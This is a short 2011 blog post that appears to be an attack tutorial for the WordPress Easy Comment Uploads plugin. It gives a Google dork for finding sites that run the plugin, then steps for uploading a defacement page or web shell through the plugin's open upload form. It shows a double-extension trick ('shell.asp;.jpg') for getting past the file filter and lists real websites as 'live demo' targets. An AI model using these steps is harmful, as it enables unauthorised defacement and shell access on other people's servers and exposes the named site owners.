Sunday, November 13, 2011

Vulnerability on Wordpress found by Rwandan Hackers

WordPress Easy Comment Upload Vunerablity

Google Dork

"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"

/wp-content/plugins/easy-comment-uploads/upload-form.php

Index of /wp-content/plugins/easy-comment-uploads

Open Google and enetr any dork which Given,

Now selct any website

and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Got Upload Option here :)

Now Upload Your Deface ....

and check it here site.com/wp-content/uploads/2011/05/yourfilehere

Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

Live Demo :-

http://equator-indonesia.com/

http://equator-indonesia.com/wp-content/plugins/easy-comment-uploads/

http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php

http://equator-indonesia.com/wp-content/uploads/2011/11/hacked.tx

No comments:

Post a Comment